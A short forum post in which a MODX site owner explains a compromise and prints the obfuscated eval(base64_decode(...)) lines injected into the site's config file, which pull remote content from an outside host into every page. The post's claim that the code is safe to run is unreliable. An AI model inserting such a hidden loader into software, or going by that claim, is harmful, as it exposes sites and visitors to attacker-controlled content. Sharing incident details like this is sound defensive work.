Hi all,
Thanks again for your feedback. We've managed to solve the crisis eventually. I actually feel stupid for not having noticed the first time...
So it was a server thing that got to the ./core/config/config.inc.php file. What it did was to add 2 quite simple (and not too obvious) lines:
ob_start();
eval(base64_decode("ZWNobyBAZmlsZV9nZXRfY29u
dGVudHMoImh0dHA6Ly93d3cuYmV0Z WtzLmNvbS9mY
XFldC5waHA/dXJsPSIuJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0pOw=="));
(you can run it safely, it's not harmful)
What that does is it fetches the contents of a remote file (beteks.com/faqet.php) and just echoes it. And because your Modx file is used throughout the site, that code will show up EVERYWHERE. It is not harmful, but it will mess up the manager quite a bit. And because it's hidden under "base64_decode" it may not catch your eye at very beginning. Kinda makes sense now
The lesson here is that you need to protect your site and server and try to stay away from shared hosting, if you can!
Thanks you al so very much!
Cheers!